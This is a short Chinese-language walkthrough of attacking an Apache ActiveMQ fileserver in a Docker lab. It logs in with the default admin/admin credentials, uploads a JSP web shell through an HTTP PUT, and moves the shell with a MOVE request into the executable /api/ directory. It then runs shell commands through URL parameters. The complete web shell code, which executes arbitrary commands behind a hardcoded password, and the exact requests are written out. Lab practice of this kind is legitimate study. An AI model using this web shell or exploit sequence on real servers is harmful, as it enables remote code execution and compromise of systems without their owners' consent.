CentOS启动docker

cd 到 ActiveMQ 目录
启动：docker-compose up -d
查看：docker-compose ps

抵达网站

点击Manage ActiveMQ brocker
用户名：admin
密码：admin

ActiveMQ管理页面

刷新抓包

左上角小框处：PUT /fileserver/text.txt HTTP/1.1
载入下面的shellcode（csdn用户：Regenwald）

<%
  	if("023".equals(request.getParameter("pwd"))){
  		java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
  		int a = -1;
  		byte[] b = new byte[2048];
  		out.print("<pre>");
  		while((a=in.read(b))!=-1){
  			out.println(new String(b));
  		}
  		out.print("</pre>");
  	}
%>

抵达 /fileserver/ 目录

shellcode 已经载入，但是在该目录无法解析，需要将文件移送到可以解析的 /api/ 目录

移送shellcode文件

MOVE /fileserver/text.txt HTTP/1.1
Destination:file:///opt/activemq/webapps/api/testhacker.jsp

地址栏传参

http://192.168.0.115:8161/api/testhacker.jsppwd=023&i=ls -al